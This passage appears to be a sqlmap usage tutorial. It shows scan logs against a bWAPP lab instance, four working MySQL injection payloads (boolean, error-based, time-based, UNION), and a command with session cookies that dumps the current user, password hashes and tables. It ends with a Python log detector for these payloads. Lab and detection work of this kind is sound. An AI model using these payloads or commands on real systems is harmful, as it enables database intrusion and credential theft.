[18:14:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:14:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[18:14:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:14:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:14:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:14:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:14:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[18:14:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[18:14:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:14:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:14:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:15:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:15:20] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:15:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:15:43] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:15:46] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:15:50] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[18:15:50] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:15:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:15:50] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[18:15:50] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[18:15:51] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[18:15:51] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[18:15:51] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[18:15:52] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[18:15:52] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[18:15:52] [INFO] testing 'MySQL inline queries'
[18:15:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:15:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:15:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:16:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:16:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:16:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:16:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:16:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[18:16:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[18:16:30] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[18:16:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[18:16:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[18:16:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[18:16:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[18:16:49] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[18:16:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[18:17:01] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[18:17:06] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[18:17:11] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[18:17:15] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[18:17:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[18:17:25] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[18:17:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[18:17:34] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[18:17:38] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[18:17:43] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[18:17:46] [INFO] testing 'MySQL AND time-based blind (ELT)'
[18:17:52] [INFO] testing 'MySQL OR time-based blind (ELT)'
[18:17:57] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[18:18:01] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[18:18:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:08] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[18:18:10] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[18:18:11] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[18:18:11] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[18:18:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[18:18:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[18:18:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:20:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:20:25] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:20:25] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[18:20:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:21:10] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[18:21:49] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3926 HTTP(s) requests:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: title=Iron Man' OR NOT 5557=5557#&action=search

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=search

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
[18:21:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
[18:21:49] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'
[*] ending @ 18:21:49 /2022-06-16/

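sqlmap usage example 3

Description:

1. Scan the bWAPP - Login injection point with a cookie attached, specify mysql as the database (-D "mysql"), retrieve the DBMS current user, retrieve the DBMS current database, enumerate the DBMS users' password hashes, and enumerate the DBMS database tables.

2. If this injection point has been scanned before, sqlmap remembers it and, on the next scan, automatically reads in the stored results and completes the injection requests, which shortens the scan.

$ sqlmap -u "http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables

Scan and analysis output: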

$ sqlmap -u "http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0" --passwords -v 0 --current-user --current-db --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:23:08 /2022-06-17/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: title (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: title=Iron Man' OR NOT 5557=5557#&action=search

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: title=Iron Man' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707871,(SELECT (ELT(9118=9118,1))),0x71787a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- DJGx&action=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Iron Man' AND (SELECT 8291 FROM (SELECT(SLEEP(5)))gNKi)-- NqMd&action=search

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: title=Iron Man' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707871,0x6a47494c595a48466c44707668676a466a624c61785854647069434e446946536d55717850476941,0x71787a6b71),NULL#&action=search
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
current user: 'root@localhost'
current database: 'bWAPP'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
database management system users password hashes:
[*] admin [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL

Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

[*] ending @ 12:24:05 /2022-06-17/
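The four payload types in the injection-point reports above leave recognisable traces in the target's web server access log. The following is an added example, not part of the original article or of sqlmap: a small detector for those traces, assuming Apache "combined" log format; the log lines, client IPs and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One signature per technique in the reports above (heuristics, not exhaustive).
SIGNATURES = {
    "boolean-blind": re.compile(r"'\s*(?:AND|OR)\s+(?:NOT\s+)?(\d+)\s*=\s*\1", re.I),
    "error-based": re.compile(r"CONCAT\(0x[0-9a-f]+,.*\bELT\(", re.I),
    "time-blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+ALL\s+SELECT\s+(?:NULL\s*,\s*)+", re.I),
}
# Apache "combined" format: client, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Constructed sample lines (documentation IP ranges), not taken from the original page.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jun/2022:18:10:01 +0800] "GET /sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Jun/2022:18:17:40 +0800] "GET /sqli_1.php?title=Iron+Man%27+OR+NOT+5557%3D5557%23&action=search HTTP/1.1" 200 9120 "-" "sqlmap/1.6.6#pip (https://sqlmap.org)"',
    '198.51.100.9 - - [16/Jun/2022:18:17:46 +0800] "GET /sqli_1.php?title=Iron+Man%27+AND+%28SELECT+8291+FROM+%28SELECT%28SLEEP%285%29%29%29gNKi%29--+NqMd&action=search HTTP/1.1" 200 4312 "-" "sqlmap/1.6.6#pip (https://sqlmap.org)"',
    '198.51.100.23 - - [16/Jun/2022:18:21:10 +0800] "GET /sqli_1.php?title=Iron+Man%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%23&action=search HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client_ip, sorted matched techniques), or None if the line is unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    # Decode %XX and '+' so the signatures see the payload as the database would.
    query = unquote_plus(urlsplit(target).query)
    hits = {name for name, rx in SIGNATURES.items() if rx.search(query)}
    if agent.lower().startswith("sqlmap/"):
        hits.add("sqlmap-user-agent")
    return ip, sorted(hits)

def summarize(lines):
    """Aggregate the techniques observed per client IP, skipping clean requests."""
    seen = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            seen.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(techniques) for ip, techniques in seen.items()}

if __name__ == "__main__":
    for ip, techniques in summarize(SAMPLE_LOG).items():
        print(ip, ", ".join(techniques))
```

The user-agent check only catches default runs; with --random-agent the header looks like a browser, so the payload signatures and the request volume (3926 requests in the first scan above) carry the detection.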
